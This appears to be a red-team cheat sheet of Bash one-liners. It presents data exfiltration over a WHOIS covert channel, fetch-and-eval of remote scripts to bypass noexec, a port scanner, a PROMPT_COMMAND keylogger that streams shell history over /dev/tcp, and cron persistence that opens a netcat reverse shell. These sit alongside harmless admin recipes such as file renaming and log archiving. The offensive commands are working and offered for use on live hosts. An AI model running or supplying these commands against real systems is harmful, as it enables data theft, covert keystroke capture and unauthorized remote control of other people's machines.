Linux Tricks#
Bash one-liners for exfil, in-memory execution, scanning, persistence, and operator hygiene. Each recipe is short, narrow, and earns its place by saving a tool install on a live host.
Exfil trick#
WHOIS as a covert channel.
# 1. Ncat listen and tee to file
$ ncat -k -l -p 4444 | tee files.b64
# 2. Compress, base64, xargs WHOIS to the Ncat listener
$ tar czf - /bin/* | base64 | xargs -I bits timeout 0.03 whois -h 192.168.80.107 -p 4444 bits
# 3. Reconstruct on the listener side
$ cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv
One-liners#
In-memory exec from a remote server (works with noexec).
$ bash -c CMD="`wget -qO- http://127.0.0.1/script.sh`" && eval "$CMD"
Bash IP / port scanner.
$ for i in {1..65535}; do
(echo < /dev/tcp/<targetIP>/$i) &> /dev/null && echo -e "\n[+] Open port at:\t$i" || (echo -n ."&&exit 1)
done
Bash web-service screenshots over an IP range.
$ IP="192.168.0"; for p in '80' '443'; do for i in $(seq 0 5); do
TAKE_SS=$(cutycapt --url=$IP.$i:$p --out=$IP.$i:$p.png); done; done
Bash keylogger via PROMPT_COMMAND.
PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/127.0.0.1/9000'
Cron-based persistence.
$ echo "* * * * * /bin/nc 192.168.1.10 1234 -e /bin/bash" > cron && crontab cron
# listener
$ nc -lvp 1234
Check if directory contents have changed.
$ find . -type f | sort | xargs sha1sum | sha1sum | awk '{print $1}'
Shodan via Bash one-liner.
$ for domain in $(curl <raw target domains file> | unfurl -u format '%r'); do
shodan search <INSERT_VULN_HERE> "ssl:$domain" | awk '{print $1}' | aquatone;
done
Grab IPs from an ASN.
$ whois -h whois.radb.net -- '-i origin AS36459' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq
Top ten largest open files.
$ lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | sort -n -u | tail
Connections to port 80 per IP.
$ clear; while x=0; do clear; date; echo ""; echo " [Count] | [IP ADDR]";
echo "----------"; netstat -np | grep :80 | grep -v LISTEN | awk '{print $5}' | cut -d: -f1 | uniq -c;
sleep 5;
done
Nmap scan every interface that has an IP.
$ ifconfig -a | grep -Po '\b(?!255)(?:\d{1,3}\.){3}(?!255)\d{1,3}\b' | xargs nmap -A -p0-
Rename items in a directory to lowercase.
$ for i in *; do mv "$i" "${i,,}"; done
Find log files modified > 24 h ago and zip them.
$ find . -type f -mtime +1 -name "*.log" -exec zip -m {}.zip {} \; >/dev/null
List IPs connected on port 80.
$ netstat -tn 2>/dev/null | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr | head
Change file encoding recursively.
$ find . -type f -name '*.java' -exec sh -c 'iconv -f cp1252 -t utf-8 "$1" > converted && mv converted "$1"' -- {} \;
Tree-like ls.
$ ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
Find a string in files recursively.
$ find . -name *conf* -exec grep -Hni 'matching_text' {} \; > matching_text.conf.list
Extract external IP via DNS.
$ dig +short myip.opendns.com @resolver1.opendns.com
Shred and erase without shred.
$ FN=foobar.txt; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom > "${FN}"; rm -f "${FN}"